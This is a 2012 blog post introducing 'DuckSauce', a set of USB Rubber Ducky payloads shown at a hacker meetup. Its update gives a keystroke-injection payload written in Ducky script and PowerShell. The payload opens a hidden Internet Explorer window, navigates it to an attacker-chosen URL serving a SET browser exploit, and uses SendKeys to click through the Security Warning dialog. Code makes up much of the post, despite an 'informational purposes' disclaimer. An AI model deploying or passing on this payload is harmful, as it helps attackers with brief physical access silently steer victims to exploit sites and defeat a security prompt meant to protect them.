Unal{0}cated – Gets introduced to DuckSauce

I had the luxury of intorducing DuckSauce v.01 at Unall{0}cated’s August mini-con. I was gald to see that several members of the auidence had brought their ducks to play around with – made for some good demos.  For those of you in attendence, I left forgottensec a zip of most current version of DuckSauce- v.01 (actually more like a 0.2 but I want to add a few more payloads before I officially release 0.2) so you should be able to download it from their file server soon.     Also, for anyone with a Duck and want their payloads included in DuckSauce, please leave a comment and I will contact you about the details – the more the merrier.

I will upload v.02  to this post once completed.

8/29/2012 update:

Having fun over at unallocated made me want to go back and build more payloads. Having been reading about all the Java 0-day information, to include how quickly it made it into SET, I figured I would put the two together.  So let’s set the scenario: you want to run SET or any other browser level attacks – what is the one thing they all have in common? That’s right; you need to get the user to surf your malicious site. Yes, there are several ways you can do this (e.g. DNS spoofing) but I was working on Ducky payloads.. hmmmm… I wonder if you can make the duck do it.  Already having a payload to modify the local host file I wanted a little more perhaps something that directly navigates to the page. Enter the powershell samples form Nishang (good stuff); I was able to leverage them to come up with ducky payload (snippet below to be run in powershell). In my lab testing, ducky payload +new SET = rock! It even answers the security pop-up for you (after all we are the keyboard). Please remember with great power comes great responsibility – I share for informational purposes only not for any malicious intent.

STRING $ie = new-object -comobject “InternetExplorer.Application”
ENTER
STRING $ie.visible = $false
ENTER
REM Enter URL Below for the $URL Variable
ENTER
STRING $ie.navigate(“$URL”)
ENTER
STRING start-sleep -seconds 3
ENTER
STRING [void] [System.Reflection.Assembly]::LoadWithPartialName(“Microsoft.VisualBasic”)
ENTER
STRING [Microsoft.VisualBasic.Interaction]::AppActivate(“Security Warning”)
ENTER
STRING [Microsoft.VisualBasic.Interaction]::AppActivate(“Security Warning”)
ENTER
STRING [void] [System.Reflection.Assembly]::LoadWithPartialName(“System.Windows.Forms”)
ENTER
STRING [System.Windows.Forms.SendKeys]::SendWait(” “)
ENTER
STRING start-sleep -m 500
ENTER
STRING [System.Windows.Forms.SendKeys]::SendWait(“{TAB}”)
ENTER
STRING start-sleep -m 750
ENTER
STRING [System.Windows.Forms.SendKeys]::SendWait(“{Enter}”)

The full payload along with many others will be released in Duck Sauce v.02 coming soon.

Posted in Latest Posts and tagged , , , , .

Leave a Reply

Your email address will not be published. Required fields are marked *